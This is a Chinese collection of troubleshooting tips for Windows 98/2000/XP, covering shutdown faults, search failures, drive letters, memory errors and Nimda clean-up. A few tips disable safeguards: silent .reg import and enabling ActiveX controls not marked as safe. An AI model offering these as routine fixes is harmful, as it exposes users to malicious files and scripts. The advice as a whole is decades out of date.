七、检查System.ini文件或Win.ini文件
1.点击“开始——运行”;
2.在“打开”框中,键入“msconfig”,然后单击“确定”;
3.在“常规”选项卡中,清除“选择性启动”中的所有复选框,选中“处理System.ini文件”复选框,再选中“处理Win.ini文件”复选框;
4.点击“确定”;
5.重新启动你的计算机。
此时如果计算机无法正常启动或关闭,则表明你的System.ini或Win.ini文件中的条目存在问题。请你仔细检查每一条目,以确定原因。确定引发问题的条目之后,请删除此条目或在此条目前加上(;)禁用此条目或修改此条目即可解决此问题。
八、查看Bootlog.txt文件
请用文本编辑器“记事本”,检查Bootlog.txt文件中的Terminate=条目。这些条目位于文件的结尾,可为问题的起因提供一定的线索。如果Bootlog.txt文件的最后一行为:EndTerminate=Kernel,你的Windows98就可以成功的关闭。如果Bootlog.txt文件的最后一行为下列某项条目,请检查所列出的可能原因:
Terminate=QueryDrivers 说明内存管理程序有问题。
Terminate=UnloadNetwork 说明与Config.sys中的实模式网络驱动程序冲突。
Terminate=ResetDisplay 说明需要更新视频驱动程序。
Terminate=RIT 说明声卡或鼠标驱动程序与计时器方面有问题。
Terminate=Win32 说明与32位程序有关的问题阻塞了线程。
九、检查Logos.sys文件
Logos.sys是图像文件,作用是显示提示“现在可以安全地关闭计算机了”。如果该文件损坏,则关机时将不出现上述的提示信息。解决方法是将logos.sys文件删除,然后从别的Windows98系统中拷贝该文件到Windows子目录下即可。
十、检查硬件
检查计算机的硬件配置,可以使用设备管理按下述步骤进行。
进入“控制面板”,双击“系统”图标。 在“设备管理”标签下,使下列分支下的所有设备无效:
显卡
软盘驱动器控制器
硬盘驱动器控制器
键盘
鼠标
网卡
PCMCIA插槽
端口
SCSI控制器可以采用下列步骤使设备管理器中的某个设备无效:
1.双击包含你想选定的设备,单击该设备,然后单击属性;
2. 在“常规”标签下,选定“在此硬件配置文件中禁用”复选框,然后单击“确定”;
3.重新引导你的系统。
如果问题解决,逐个启用刚才禁用的设备,并检查有没有设备冲突。
按下列顺序逐个启用设备:
COM端口
硬盘控制器
软盘控制器
其它设备
启用禁用的设备,并检查有没有设备冲突可按下述步骤进行:
1.在设备管理器中双击包含你想选定的设备,单击该设备,然后单击属性;
2.在“常规”标签下启用禁用的设备;
3.在“资源”标签下检查“冲突的设备列表”的内容。注意,并非所有设备都有“资源”标签。 单击“确定”;
4.重新启动系统。
如果问题仍然没有解决,可以单击“开始——程序——附件——系统工具——系统信息”,然后单击“工具”菜单,单击“自动跳过驱动程序代理”工具以启用所有被禁用设备的驱动程序。
如果通过上述步骤,确定了是某一硬件引起的非正常关机问题,应该与该设备的代理商联系,以更新驱动程序或固件(firmware,指更新升级flash ROM的内容)。
其实Windows 98系统非正常关机的故障并不可怕,只要我们认真对待,通过以上几种方法,基本上能够解决你的Windows98不能正常关闭的问题。

七十九、五招解决WinXP启动后操作迟延的问题

症状:启动刚进入系统界面时,点什么都打不开,要等一分钟左右才能打开
症状:启动刚进入系统界面时,点什么都打不开,要等一分钟左右才能打开。
解决办法:
一、首先,请升级杀毒软件的病毒库,全面杀毒,以排除病毒原因。什么?你没安杀毒软件!?——除非你是老鸟(此文大虾和老鸟跳过^_^),否则建议安装。What?盗版的,不能升级!?这个问题别问偶,自己想办法!
 二、开始→运行,输入msconfig→确定。在打开的系统系统配置程序里,将一些不重要的服务以及启动程序关闭,重启电脑。
三、进入“我的电脑”——工具——文件夹选项——查看——取消“自动搜索网络文件夹和打印机”的勾选。
四、在Windows XP启动进入桌面后系统会暂时停滞一段时间,这时启动任何程序都会没有反应,这是因为Windows XP的DHCP Client服务正在为网卡分配IP地址,系统会暂时停滞一段时间。解决这个问题,只要在“控制面板→网络连接”里,用鼠标右键单击“本地连接”图标,然后选择属性,在弹出的属性窗口(如图)的“常规”选项卡的列表里选择“Internet协议(TCP/IP)”一项,然后单击“属性”按钮。在弹出的属性窗口中,选择“使用下面的IP地址”选项,并在“IP地址”和“子网掩码”中分别输入“192.168.0.1”和“255.255.255.0”,最后单击OK退出设置窗口。
开始→设置→网络连接→右击“本地连接”→属性→双击“Internet 协议 (TCP/IP)”→如果IP地址为空的话,点“使用下面的IP地址”指定IP地址和子网掩码。如可以将IP地址设为192.168.0.X(X为1-255之间任一值),子网掩码可设为255.255.255.0→确定→确定。
五、清除预取目录,进入C:\WINDOWS\Prefetch文件夹,将扩展名为pf的文件全部删除,重启

八十、Win XP系统搜索故障以及处理办法点点通


  故障1:单击资源管理器工具栏上的“搜索”按钮或者按F3,系统无任何响应。
  解决方法:首先进入C:\Windows\inf文件夹(该文件夹属性为隐藏),右键单击srchasst.inf文件,选择“安装”菜单,系统会提示你插入Windows XP安装光盘,该操作为重新安装Windows XP的搜索服务组件。对于在搜索中遇到的其它故障,大家也可以将该方法作为最后的救命稻草。
  故障2:系统提示“A file that is required to run Search Companion cannot be found. You may need to run setup”(找不到搜索组件)。
  解决方法:造成这个故障的原因是C:\Windows\srchasst\mui\0409下的BAR.XSL、BALLOON.XSL等文件损坏,我们可以首先尝试清空IE临时文件夹,如果问题还未得到解决请安装http://download.microsoft.com/download/whistler/Patch/Q319949/
   WXP/EN-US/Q319949_WXP_SP1_x86_ENU.exe(英文版Windows XP用户),如果你尚未安装SP1,请安装。
  故障3:系统提示一个黄色带感叹号的三角形警告。
  解决方法:首先运行“Regedit”命令打开注册表编辑器,依次定位到“[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0 -5564-11d1-83f2-00a0c90dc849}]”分支,在右边窗口中找到“默认”,将其值修改为“Search Results Folder”。接下来定位到“[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Cabinet State]”,在窗口右边新建一个字符串键,其名为“Search Asst”,讲其值设置为“no”。
  故障4:“开始”菜单中的“搜索”菜单丢失。
  解决方法:运行“Regedit”命令打开注册表编辑器,定位到“[HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],在窗口右边新建一个名为“NoFind”的dword值,将其值设置为00000000(十六进制)。

八十一、XP输入法状态条不见了

打开注册表编辑器,找到“HKEY_USERS\.DEFAULT\Control Panel\Input Method”分支,将右边窗口中“Show Status”的键值修改成“1”(“1”为显示状态条,“0”为不显示状态条),然后重新启动系统,输入法状态条就出来了。此方法对Win 98/2000都适用。
打开“我的电脑→控制面板→区域和语言选项”,在“语言”标签页下的“详细信息”中,点击“设置”标签页下的“语言栏设置”按钮,选择“在桌面显示语言栏”后点击“确定”即可。
我的电脑-控制面板-区域和语言选项-语言-详细信息-高级,把关闭高级文字服务前面的钩去掉。

八十二、Windows XP搜索功能失效

  问:我的电脑安装的是Windows XP系统,最近它的文件搜索功能不能用了,打开搜索界面时,输入文件或文件夹名的文本框是灰色的,无法输入。请问该怎么解决?
  答:打开注册表编辑器,定位到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState],新建字符串值“Use Search Asst”,设值为“no”。查看C:\Windows\System32\下的Shell32.dll文件语言版本,中文(0804)、英文(0600)等,将C:\Windows\Srchasst\mui\下原为0804或0409等的目录名改为与Shell32.dll语言版本相同的数字。现在打开搜索助理,是不是可以用了?

八十三、解决不定时搜寻软驱问题

如果Windows 98/Me 常常会有事没事就去检查软驱,可以从下面几个方面依顺序来检查,排除问题。以下越在前面的方法,可能性越大。
  ·清除开始菜单中,「文档」里的资料,如果你曾经开启过软盘上的文件,而这文件名称还存在于「文档」里的话,Windows 有可能会去搜寻软驱。
  ·清除开始菜单中,「运行」里的项目。
  ·到「设置」>>「控制面板」,打开「系统」,到「性能」这页,按「文件系统」,到「磁盘」,不要勾「每次开机就搜寻新的软驱」,按确定,当你重新启动计算机之后,Windows 就不会去侦测你的软驱。
  ·检查一下是不是你的防毒软件会去检查软驱(例如 McAfee 、Antivirus 、Pccillin..等),请查阅你的防毒软件说明。
  ·检查一下是不是你计算机上的一些工具软件会去检查你的软驱。
  ·检查 MSDOS.SYS 这个文件里面(你必须知道如何修改文件属性,才能修改 MSDOS.SYS 的内容),有没有 LocalLoadHigh=1 这一行叙述,有的话,删掉。
  ·检查一下是不是病毒的关系,造成系统不定时去搜寻软驱(例如 NEUVILLE 病毒)。
  ·检查 registry:HKEY_CLASSES_ROOT/CLSID 的值,看看有没有任何的路径是指向到软盘上的。

八十四、部分软件无法安装

  问:最近我的Windows 2000系统在安装一部分软件时出现了问题,总是刚开始安装一会儿之后就出现如下提示:“安装程序启动安装引擎失败:不支持此接口”,重装系统后仍然出现这个问题,请问如何解决?
  答:有的软件安装需要Windows Installer支持,一般解决方法为:点击“开始→程序→管理工具→服务”,找到Windows Installer服务,将属性打开,将启动类型改为手动,然后启动即可。记住在安装好程序后将此服务停止。如果仍然存在问题,请到微软站点下载最新的Windows Installer 2.0版。如果问题仍然存在,按如下步骤检查:①是否具有管理员的权限。②安装文件是单线程的,查看正在运行的进程,如果里面有ikernel.exe,则表示现在无法安装,结束此进程,然后再安装就OK了。③删除Program Files\Common Files\InstallShield\Engine文件夹,然后重新运行安装程序。

八十五、解决插电即开机问题

  现象:有些朋友有关机后断开电源板电源的习惯,可是却常常被一个问题困扰,就是电源板一通电,计算机就自动开机了,Power键形同虚设。
  解决:有些主板在BIOS设置的“Power Management Setup”中,有一个选项 “Pwron After PW-Fail”,它的默认设置为“ON”,将它设置为“OFF”,下一次再通电时就不会自动开机了。如果没有这个选项,可以把电源管理中的ACPI功能关闭之后再次打开,如果本来就是关闭的,打开它即可。
大多数主板在BIOS中有一个选项:即在POWER MANAGEMENT SETUP(电源管理设置)中可以选择在意外断电后重新来电时机器的状态,是自动开机或是保持关机状态还是保持断电前的状态。请把自动开机设为Off。
??此外,电源或主板质量不佳也可能导致类似问题出现。ATX主板的启动需要检测一个电容的电平信号。如果在接通电源的时候不能保证一次接通良好,就会产生一个瞬间的冲击电流,可能使电源误认为是开机信号,从而导致误开机。


八十六、解决窗口按钮上乱码问题

  问:我有一台电脑,操作系统是Win98第二版,现在不知是什么原因,窗口上的最小化、最大化和关闭按钮,还有菜单上的向下或向右的箭头全都成了乱码,我想问一下到底是哪个文件出了问题?
  答:在Win98中,Marlett是一个系统字体文件,窗口的最小化、最大化等按钮,就是用它来显示的。从你描述的情况可以看出,这个字体文件已经被破坏或被删除。你只要到安装了Win98第二版的机器上拷贝一个好的Marlett字体文件,然后再将它拷贝到自己系统的Windows\fonts目录下(都要在DOS状态下进行)就行了。如果本机上的Marlett.ttf文件存在但被破坏,那么先要去掉原来字体文件的隐藏属性,这样才能覆盖它。如果对DOS操作不熟悉,可以使用The Font Thing(下载地址:http://www.onlinedown.net/thefont.htm)之类软件在Windows下进行字体的拷贝和安装。

八十七、打开硬盘分区出错

  问:我用Windows优化大师对系统作了优化后,不知道是误操作还是怎么了,发现E盘图标变成优化大师图标,双击E盘会进入MS-DOS方式,单击右键然后选“打开”才能进入E盘,请问如何让E盘恢复正常?
  答:打开注册表编辑器,找到HKEY_CLASSES_ROOT\Drive,把右边的默认值里面的内容删除。图标的修改是:找到HKEY_CLASSES_ROOT\Drive\DefaultIcon,修改右边的图标为你需要的图标。以Windows XP为例,这个键值是:%SystemRoot%\System32\shell32.dll,8(不同的操作系统,该键值是不同的)。

八十八、注册表文件不出现确认对话框

 去掉导入注册文件时弹出的对话框,只要打开注册表编辑器,展开到HKEY_CLASSES_ROOT\regfile\shell\open\command,将右边名称为“默认”的数据 regedit.exe "1" 改为 regedit.exe /s "1" 即可。如果想恢复的话,只要去掉“/s”即可。

八十九、多系统安装

首先在BIOS中设置系统启动顺序为“光盘优先启动”,然后把Win98安装光盘放入光驱,启动电脑进行安装。在“选择Windows 98的安装目录”窗口上选择“其他目录”,并指定为“E:\WINDOWS”,然后按常规方法完成安装。
恢复多系统启动菜单
当你安装完Win98后,重新启动电脑,是不是发现我们熟悉的多系统启动菜单并没有出现,致使Win2000和WinXP都无法启动了,这如何是好?不要着急,下面我们就一步一步来恢复多系统启动菜单。
①首先在BIOS中设置系统启动顺序为“光盘优先启动”,然后将Win2000安装光盘放入光驱,进入安装画面,这时有三个选项可供选择,按“R”进入修复项。
②“Windows 2000修复选项”中提供了两个选项,再次按“R”键选择“用紧急修复过程修复Windows 2000”,出现“手工修复”和“快速修复”两个选择项,选择“手工修复”。
③接下来进入“选择修复任务”窗口,点击“[X] 验证Windows 2000系统文件”选项,再点击“继续(执行所选任务)”,开始修复启动扇区。
④这时,Windows 2000安装修复程序会询问你是否有紧急修复软盘。因为我们不需要修复软盘,所以按“L”键让安装程序自动查找Windows 2000不能启动的原因。Windows 2000修复程序找到需要恢复的Windows 2000,按下回车键进行恢复。这时,修复程序会自动检查磁盘、引导扇区,然后设置启动菜单,这样,不但找回不能启动的Win2000,而且还能把Win98自动加入启动菜单中。
⑤虽然启动菜单中有了Win2000和Win98,但WinXP依旧还是没有恢复,不用着急!进入Windows2000,把Windows XP安装光盘放入光驱,然后进入光盘的i386目录,可以找到ntldr和Ntdetect.com两个文件,把它们拷贝到C:\下,这时候多系统菜单就恢复了,WinXP也可以进入了。但你会发现多系统启动菜单居然变成了英文的了,这个时候我们可以到C:盘根目录下打开一个Boot.ini文件,只要编辑一下里面的内容即可。

九十、解决多硬盘盘符混乱问题

  现象:在安装了第二块硬盘后,老硬盘与新硬盘上的盘符会出现盘符交叉的现象,在调用文件的时候就会出现很多麻烦,甚至导致某些程序无法使用。
??方法:
1.屏蔽硬盘法
??将两块硬盘设置好主从关系并正确连接,然后开机进入BIOS设置程序。在“Standard CMOS Features”选项中将从盘参数项设为“NONE”,屏蔽掉从盘。在“Advanced BIOS Features”选项中设置主盘为启动硬盘。保存设置后重新启动,则硬盘盘符就会按照主、从盘的分区顺序排列好了。这种方法的缺点是从盘只能在Windows下正常使用,在纯DOS模式下无法识别从盘。
??2.重新分区法
??设置好主从关系并正确连接硬盘后,使用任一款分区软件将从盘全部划为逻辑分区,则从盘的盘符就会按顺序排在主盘后面。(陈会安)
??3.Win 9x:使用Letter Assigner
??Letter Assigner能够任意指定硬盘的盘符。启动Letter Assigner,在Letter Assigner的工具栏下方列出了“A~Z”26个盘符,其中黄色表示当前可以选择使用,灰色表示当前不可使用。在主窗口中选中需要修改的盘符,然后从盘符栏中选择修改后的盘符,执行“文件→保存”命令,重新启动计算机即可。
??在操作过程中,如果需要放弃修改,只要执行“编辑→恢复原版”或者按下“Ctrl+Z”组合键即可。一般情况下系统盘的盘符不能修改,否则可能造成系统启动错误。当修改系统盘的盘符时,Letter Assigner会弹出一个提示窗口。(LanFu)
??4.Win 2000/XP:操作系统设置法
??以上几种方法建议大家只在Win 9x\Me下使用,而在 Win 2000\Me下硬盘的混乱问题已经得到解决,并且可以通过设置指定驱动器名。
??以Win 2000为例,操作步骤是:打开“控制面板→管理工具→计算机管理”,接着展开“存储→磁盘管理”,右键选中需要调整的分区,选择“更改驱动器名和路径”选项,点击“编辑”按钮,然后进行调整工作即可。
??注意:所设定的驱动器名称只能是未使用过的;当设定完成后,会弹出警告窗口,说该操作可能造成驱动器停止,不用理会,点击“确定”即可。(任亚维)
??5.利用PartitionMagic
??PartitionMagic(分区魔术师)可以对硬盘进行重新分区、格式化、复制分区等操作,使用它修改盘符的操作方法如下:
??启动PartitionMagic,鼠标右击需要修改的盘符,在快捷菜单中选择“高级→修改驱动器盘符”,然后在弹出的“更改驱动器盘符”窗口中选择新的盘符,单击“确定”按钮,接着选择“常规→应用改变”命令,按照提示重新启动即可。
另:
  (1)Windows 2000/XP
  Windows 2000/XP一般不会产生盘符交叉的问题,但前提是安装Windows 2000、XP时只安装了一块硬盘,安装结束后才能挂上第二块硬盘,假如是在添加第二块硬盘后安装Windows 2000/XP的话,那么仍然会产生盘符交叉,而且这是永久性的,即使取下第二块硬盘也无济于事。
  不过,我们可以进入“控制面板→管理工具→计算机管理”窗口,在“计算机管理”下选择“磁盘管理”,选中相应分区,从右键菜单中执行“更改驱动器名和路径”命令,在图1对话框中点击“更改”按钮,然后重新指派一个驱动器号,再对其他分区重复执行该命令即可。
  (2)Windows 9x/Me
  有一个简单的办法可以解决这一问题,只须在BIOS设置程序中稍稍动些脑筋,将第一块硬盘设置为“User”或“Auto”,而将第二块硬盘设置为“NONE”,这样尽管BIOS无法发现这块硬盘,但Windows 9x/Me的即插即用功能会自动检测第二块硬盘,并自动分配盘符,令人担心的盘符交叉现象也就不复存在了。当然在纯DOS模式下第二块硬盘是看不到的。
  (3)Fdisk
  我们可以在执行Fdisk命令分区时,选中“Change current fixed disk drive”项,然后选中第二块硬盘将所有分区删除,再选择“Create Extended DOS Partition”将所有空间都分配给扩展分区使用,接下来再进行分区。也就是说不创建主分区只创建扩展分区,最后格式化就行了。

九十一、系统关机变重启故障

一、正确设置BIOS
  如果你的计算机连上了网络或者连着USB设备,那么BIOS的设置不对很可能会导致不能正常关机。一般而言,老主板容易出现这种故障,在BIOS里面禁掉网络唤醒和USB唤醒选项即可。
  二、设置电源管理
  关机是与电源管理密切相关的,有时候电源管理选项设置得不正确也会造成关机故障。
  点击“开始→设置→控制面板→电源选项”,在弹出的窗口中,根据需要启用或取消“高级电源支持”(如果你在故障发生时使用的是启用“高级电源支持”,就试着取消它,反之就启用它),Windows 98中这种方法往往能解决大部分电源管理导致的关机故障。
  如果没有选中“高级”菜单里的“在按下计算机电源按钮时(E):关闭电源”,把它选中即可。
  三、禁用快速关机
  有时使用了Windows的快速关机功能也会导致这类关机故障。在Windows 98中可以通过下列方法来解决:在“开始→运行”中输入Msconfig,打开“系统配置实用程序”,在“高级”选项中选中“禁用快速关机”,然后重启计算机即可。

九十二、光驱读盘不正常

  问:我的电脑安装的是Windows XP操作系统,安装好后出现了一个问题,就是不能连续读光盘,插入第一张光盘一切正常,打开光驱放入第二张光盘,发现里边的内容竟是第一张光盘的内容,重新启动机器后,第二张光盘也能正常读出,这是什么原因?
  答:用鼠标右键点击“我的电脑”,选“管理”,选择“存储→可移动存储→库”,点击光驱所在的盘符,在名称项目中点鼠标右键选“属性”,在“延迟卸除”下有一项为“收回不可装入的媒体”,将它的时间改为0,应该可以解决这个问题。如果问题未能解决,则打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}键值,将下面的UpperFilters 和LowerFilters删除,重启机器即可。

九十三、回收站无法清空

  问:我的系统是Windows XP,我从F盘中删除了一个名为“dvdregionfree3031”的文件后,系统出现问题,表现为回收站中的内容无法清空,而且每次打开回收站时它总先搜索一遍,然后在清空回收站时显示一个确认删除对话框,选“是”后清空,再次打开回收站时又出现了上述情况,请问我该怎么办?
  答:启动到带命令行的安全模式下,然后对每一个分区下的Recycled目录执行Attrib -s -r -h命令去除特殊属性,然后使用Del命令删除每一个分区下的Recycled目录。操作完毕后重新启动进入正常模式,问题一般即能解决。

九十四、解决活动窗口按钮被改写

电脑中缺少了“Marlett”字体。
你可以在其他电脑中复制该字体到自己电脑的“控制面板---字体”中,也可以使用安装盘在“文件---安装新字体”中安装该字体。

九十五、解决接通电源后自动开机问题

ATX主板经常会遇到这样的问题,一般在主板的BIOS里将电源管理项“POWER ON AFTER PWFAIL”设为OFF即可。

九十六、操作系统停止响应

  海南读者李俊来信:我用的是Win 98和Win XP双操作系统。多数时候用Win XP,Win XP在关机或重启时,好些时候它总停在“正在保存系统设置”处,硬盘的灯不再闪烁,系统就不响应了!这是什么原因呢?
  A:启动和关闭计算机时系统总是提示:“正在保存系统设置”,这主要是因为系统运行后加载的文件太多了,导致系统在短时间内运行太多的文件而不能中止,我们可以用“Ctrl+Alt+Del”键调出“Windows任务管理器”,单击“进程”就可以查看当前运行的文件。要解决此类问题,在“开始→运行”中键入“Msconfig”命令,在弹出的“系统配置实用程序”对话框,单击“启动”标签项,这里都是随着系统启动的一些程序,在此将一些不常用程序前面的钩去掉即可。另外,硬盘上的碎片过多也会导致系统关机或重启时间过长甚至造成死机现象,所以我们还要定期对硬盘进行碎片扫描。如果你在关机或注销时设置了声音文件,如果此声音文件破坏也会导致出现这类问题,我们可以到“控制面板→声音和音频设置”中将声音去掉。如果问题仍未解决,我们可以右键点击“我的电脑”,选择“管理”,并在“服务和应用”项中选择“服务”项目,在右侧的窗口中将不必要的服务停用,注意停用前一定要仔细阅读当前服务的文字说明。

九十七、解决开机ESCD错误

??问:我的电脑在开机的时候,屏幕显示出一段英文提示,大致意思是ESCD写入出现了错误,请问这会不会影响系统正常使用?
??答:系统在启动时需要对即插即用设备及非即插即用设备进行自检,然后写入BIOS。出现“ESCD 写入”的错误,可能的原因一是主板BIOS的防改写跳线被选择,这时BIOS数据就无法改写。另一个可能是主板的BIOS芯片造成的,如果BIOS芯片有损坏的话,可能会造成信息不能完全写入。这种现象对系统正常使用没有什么大的影响,你可以不必理会。

九十八、开始菜单响应速度过慢

  问:我每次单击Windows的开始菜时,弹出下一组菜单都非常慢,可是以前单击开始菜单时却很快,我想问问用什么方法可以调节开始菜单的弹出速度?
  答:开始菜单的弹出速度是可以控制的,我们可以在控制面板中对它进行修改:打开注册表编辑器,依次展开HKEY_CURRENT_USER\ControlPanel\desktop分支,然后在此创建一个DWORD值,并将它命名为“Menushowdelay”,你可以将该键的键值设为0至0100000之间的值,这个值就是显示菜单延长时间的值,单位为MS,输入后重启计算机即可生效。

九十九、解决控件提示问题

Q:我在用OE脱机浏览邮件时,总是出现这样的警告信息:“该页上的ActiveX控件不安全,当前安全设置禁止运行该页上的不安全控件,因此,可能无法正确显示该页”。“安全设置”中我设置的是“中”,即使调到低也是同样的情况,请问这是为什么,如何避免?
  A:这是因为OE(IE)中对Internet上Web页面的安全设置出现的一个提示信息。在“选项”的“安全设置”中,选定为“中”级时,“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“禁用”;选定为“低”级时,则设为“提示”。这样,当浏览Web页面的邮件时,就会出现无法显示(“禁用”时)或不安全的提示(“提示”时)。如若我们确实需要浏览该Web页面的邮件时,可在OE(或IE)“选项”的“安全设置”中,选定为“自定义级别”,对“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“启用”即可。为防不测,在浏览时要开启病毒监控。 (重庆 孙先华)

一百、解决某些网页不能访问

??问:我单位有一个小型局域网,安装了ADSL共享上网,速度很快,可是存在一个很麻烦的问题,就是某些网站常常无法正常访问(比如新浪网站),请问如何解决?
??答:如果使用ADSL时某些网页上不去,可能是因为网络的MTU值不匹配的缘故。“MTU”是“Maximum Transfer Unit”(最大传输单元)的英文缩写。MTU定义了基于TCP/IP协议在网络中传输的每一个数据包所含的字节数,修改MTU值的参数可以提高网络访问的速度。操作系统对MTU有一个默认值,但并不是最优化的设置,如果使用者不满意的话,可以自己调整这项参数的设置。
??具体方法:一是在Win98系统中选择“网络”选项中的“拨号网络适配器”,然后单击“属性”,在新出现窗口中再选中“高级”选项,里面有一个“IP包大小”的选项,用户可以自己调整其中的大小级别。第二种方法是运行REGEDIT程序,找到注册表中的HKEY_LOCAL_MACHINE\Enum\Root\Net选项,修改其中的MTU数值,当然也可以使用专门的软件,比如MTU Speed Pro来修改这一数值。

一百零一、“内存不足”的解决方法

  大家在应用电脑时一定都遇到过机器提示内存不足的现象吧,那么什么是内存不足,又该如何处理呢,下面我们就来讲一讲有关这方面的内容。
  所谓“内存不足”就是指在启动或运行DOS应用程序和Windows应用程序时,系统报“Out of memory"或“内存不足"的错误信息。“内存不足”是一种很常见的故障,运行DOS应用程序和Windows应用程序引起“内存不足”的原因不完全相同。
  一、DOS下的内存不足
  如果是在运行DOS应用程序时出现“ Out of memory”(内存不足)的故障,可按以下方法进行检查和处理:
  1、检查系统是否提供对扩充内存的支持,必须保证CONFIG.SYS文件中的EMM386.EXE命令中含有RAM参数,关于RAM参数的设置请参考相关文章,这里就不述叙;

  2、 如果故障仍存在,检查DOS内核程序与其它运行的应用程序是否兼容,某些程序是否占用了大量的常规内存,并作出相应的处理。
  举个例子:一次我在运行WPS 时,屏幕显示“内存不够”,系统无法运行。考虑到在运行WPS之前曾执行过一些其它程序,可能是这些程序没有完全从内存中退出,于是重新启动,运行金山汉字系统,WPS 编辑软件仍无法进入,用DOS 6.22的Mem命令查看内存,仅剩200KB左右的空间,且CHLIB文件占用主内存达255KB,即字库放在了常规内存中,而金山系统是应该可以自动使用扩展内存存放字库的,查看系统配置情况,在CONFIG.SYS中设有:
  DEVICE=C:\DOS\HIMEM.SYS
  DOS=HIGH
  这就是说,DOS内核程序调入扩展内存后,虽然扩大了可用主内存空间,但是由于扩展内存与金山系统发生冲突,以致汉字库无法载入扩展内存。解决的办法有两种:
  1、去掉DOS=HIGH设置,将DOS内核程序从扩展内存撤出,即可正常运行。
  2、将“/DEVICE=C:\DOS\HIMEM.SYS"改为“/DEVICE=C:\DOS\HIMEM.SYS/INT15=320",因金山系统使用的是扩展内存的低端,这一区域若有其它程序驻留,字库就不能正常载入,利用INT15参数给系统先预留出一部分传统的扩展存储器(即不由XMS规范管理而由INT15直接使用的扩展存储器),字库和DOS内核都可使用扩展内存了,这样设置之后,在金山汉字系统状态下可用的主内存空间可达512KB,比不设置时多出250KB左右。
  二、Windows中的内存不足
  如果在运行Windows应用程序时,出现“内存不足”的故障,可按下列方法进行检查和处理:
  1、首先应检查Windows的资源使用情况,如果资源占用较多,可用资源较少,打开新文件时会出现“内存不足"的问题。这时可以清理屏幕,减少窗口的数目,关闭不用的应用程序,包括TSR内存驻留程序,将Windows应用程序最小化为图标,如果问题只是在运行一特殊的应用程序时出现,则与应用软件销售商联系,可能是数据对象的管理不好所致;
  2、如果问题没有解决,清除或保存Clipboard(剪贴板)的内容,使用ControlPanel Desktop选项将墙纸(Wallpaper)设置为None;
  3、如问题仍存在,可用PIF编辑器编辑PIF文件,增大PIF文件中定义的MemoryRequirements:KB Required的值;在标准模式下,选择Prevent ProgramSwitch,该开关选项打开后,退出应用程序返回Windows;如果是386增强模式,则要将Display Usage设置成Full Screen(全屏幕方式),将Execution设置为Exclusive,将Video memory设置为尽可能低的方式;
  4、 如果问题仍存在,则重新开机进入Windows系统,并且确保在“启动"图标中没有其它无关的应用软件同时启动运行,在WIN.INI文件中也没有Run或Load命令加载的任何无关的应用程序。
  在平时,出现“内存不足"的问题一般可以按以下办法处理。首先,退出那些不需要运行的应用程序,然后,再检查系统的可用资源为多少。如果可用资源大于30%,一般可以运行新的程序。当有多个应用程序在系统中运行时,可以退出一个,检查一次可用资源,如果某个应用程序在退出前后,可用资源的百分比没有变化,说明这个应用程序没有释放它所占用的资源。如果要收回这些没有释放的资源,只能退出Windows后,再重新进入Windows。为了确保在启动进入Windows时系统的可用资源足够,在“启动"图标中应该没有无关的应用软件同时启动运行,在WIN.INI文件中也没有由Run或Load命令加载的任何无关的应用程序,因为这些同时启动的无关应用程序可能已经占用了很多资源,使得要使用的应用程序无法运行。
  一般说来,经过这样处理,就不会出现“内存不足"的问题了。

一百零二、任务栏的图标变大了

  问:近日,不知执行了什么操作,任务栏上的图标变得和桌面上的一样大,虽然不影响使用,但看起来非常不美观。请问怎样才能让它恢复原样呢?
  答:运行regedit.exe打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics,在右边的窗口中找到字符串值:“Shell Icon Size”,改变其值就可以改变图标的大小。一般是“32”这个数值。注意修改注册表前请事先备份注册表。

一百零三、解决鼠标乱动问题

现象:鼠标有时胡乱乱动,不听指挥。我怀疑是有病毒或木马之类,所以用金山毒霸、iparmor5.33、the cleaner查杀过,均未发现过问题。但我在“系统信息→正在运行的任务”下发现几个没有路径、版本和任何信息的任务。不知道和这有没有关,请问这三个任务是什么东西,能否删除,怎样删除?
这是一种NIMDA病毒。解决方案如下:
(1) 检查临时文件夹是否存在MEPXXXX. tmp 和MEPXXXX.tmp.exe文件,XXXX是由字幕和数字随机组成的字符串。
(2) 检查C:\,D:\,E:\是否存在httpodbc.dll文件。
(3) 是否带宽被严重占用。
(4) 在Windows 9x/ME系统中,\Windows\ system目录下是否存在LOAD.exe文件。
(5) 在Windows NT/2K系统中,\Windows\ System目录下是否存在CSRSS.exe隐藏文件。
建议你下载Symantec和Trendmicro的查杀Nimda_E病毒工具进行检测和清除。http://support.marsec.net/focus/nimda_e/FxNimdaE.com
http://support.marsec.net/focus/nimda/trend_nimda.zip
查杀步骤:
(1)在http://support.marsec.net/focus/nimda_e/FxNimdaE.com下载FxNimdaE.com,存放在系统里。
(2)停掉系统所有正在运行的程序。如果你的系统是Windows Me,你必须停掉Windows Me的系统恢复功能,因为病毒有可能被自动保存在备份目录里。双击运行FxNimdaE. com,运行此程序需要你以系统管理员帐号登录,在操作前停掉IIS服务或者拔离网线,以免在清除过程中再次感染。然后点击Start键运行程序直到报告说系统已经清除掉病毒。

一百零四、解决鼠标右键被锁定

  问:我的电脑不知道为什么鼠标右键被锁定了,用不了。请问如何解决?
  答:可能是有人在你的注册表中做了手脚,锁定了右键菜单。打开注册表编辑器,选择以下子键:
  “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”在右窗格中找一个名为“NoViewContexMenu”的键值,把其数据改为00 00 00 00。或者干脆删除这个键值即可。

一百零五、解决“添加删除程序”里面隐藏问题

在C:\Windows\Inf下找到Sysoc.inf文件,用记事本程序打开它,该文件显示了当前已安装程序的部分列表。我们拿MSN Messenger来做个实验,在其中找到这一句“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7”,其中“msmsgs”是MSN Messenger的条目名,“hide”这个参数就是控制着程序是否在“添加/删除程序”中显示,我们只要把它删除,变为“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7”,然后重新启动电脑,再次到“添加/删除程序”中,就会看到MSN Messenger了。
